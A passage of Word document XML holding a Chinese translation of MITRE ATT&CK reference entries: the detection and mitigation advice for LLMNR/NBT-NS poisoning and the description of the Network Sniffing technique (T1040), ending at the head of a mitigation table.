      <w:tr w:rsidR="000F2665" w14:paraId="57FE4C98" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B7E05E0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId160" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="004779E1">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>过滤网络流量</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7051" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CB43265" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用基于主机的安全软件来阻止</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>LLMNR / NetBIOS</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量。</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>启用</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SMB</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>签名可以阻止</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTLMv2</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中继攻击。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51CD3F74" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0835FB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D2211E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>监视</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2211E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>HKLM \ Software \ Policies \ Microsoft \ Windows NT \ DNSClien</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2211E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2211E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>EnableMulticast</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2211E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2211E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2211E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的更改</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2211E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。值“</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2211E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2211E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>”表示</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2211E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>LLMNR</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2211E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>被禁用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380BCD27" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D185E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>如果安全策略禁用</w:t>
      </w:r>
      <w:r w:rsidRPr="008D185E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>LLMNR / NetBIOS</w:t>
      </w:r>
      <w:r w:rsidRPr="008D185E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>，则监视端口</w:t>
      </w:r>
      <w:r w:rsidRPr="008D185E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>UDP 5355</w:t>
      </w:r>
      <w:r w:rsidRPr="008D185E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="008D185E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>UDP 137</w:t>
      </w:r>
      <w:r w:rsidRPr="008D185E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>上的流量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CA2B62" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D185E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>部署</w:t>
      </w:r>
      <w:r w:rsidRPr="008D185E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>LLMNR / NBT-NS</w:t>
      </w:r>
      <w:r w:rsidRPr="008D185E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>欺骗检测工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="008D185E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>监视事件</w:t>
      </w:r>
      <w:r w:rsidRPr="008D185E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>ID 4697</w:t>
      </w:r>
      <w:r w:rsidRPr="008D185E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="008D185E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>7045</w:t>
      </w:r>
      <w:r w:rsidRPr="008D185E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="008D185E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="008D185E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>事件日志可以帮助检测成功的中继技术</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EF1CC0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D2EDCE6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00872AC7" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络嗅探</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="008911C2" w14:paraId="71EBE739" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79DD33A6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号：</w:t>
            </w:r>
            <w:r>
              <w:t>T1040</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36136E2D" w14:textId="419988EA" w:rsidR="000F2665" w:rsidRPr="00233E89" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据访问</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22768C64" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38F49C37" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
            <w:r>
              <w:t>要求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00233E89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络接口访问和</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络抓包</w:t>
            </w:r>
            <w:r w:rsidRPr="00233E89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>驱动程序</w:t>
            </w:r>
            <w:r>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B19B330" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需</w:t>
            </w:r>
            <w:r>
              <w:t>权限：管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43FBFDAC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r>
              <w:t>设备日志，主机网络接口，</w:t>
            </w:r>
            <w:r w:rsidRPr="00233E89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00233E89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术网络流分析</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="353F8308" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r>
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId161" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="008911C2">
                <w:t>CAPEC-158</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="609291B0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="003446E4" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02127131" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="188D2577" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络嗅探是指使用系统上的网络接口来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>捕捉</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过有线或无线连接发送的信息。攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将网络接口设置为混杂模式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被动地访问网络中传输的数据，也</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口镜像来获取</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大量数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E316B4" w14:textId="2E82C97C" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过此技术</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>捕捉</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据可能包括用户</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，尤其是通过不安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未加密协议发送的用户</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>也可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名称解析服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下毒</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LLMNR / NBT-NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下毒</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和中继）通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重定向</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来捕捉网站</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理和内部系统的</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EAEB62" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络嗅探还可能会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>透露</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置详细信息，例如正在运行的服务，版本号和后续横向移动和</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逃逸</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>活动所需的其他网络特征（例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址，主机名，</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VLAN ID</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A54C8F9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2685"/>
        <w:gridCol w:w="7051"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00872AC7" w14:paraId="775D78A4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="11AEBF0B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00872AC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00872AC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7051" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="77E3C084" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00872AC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
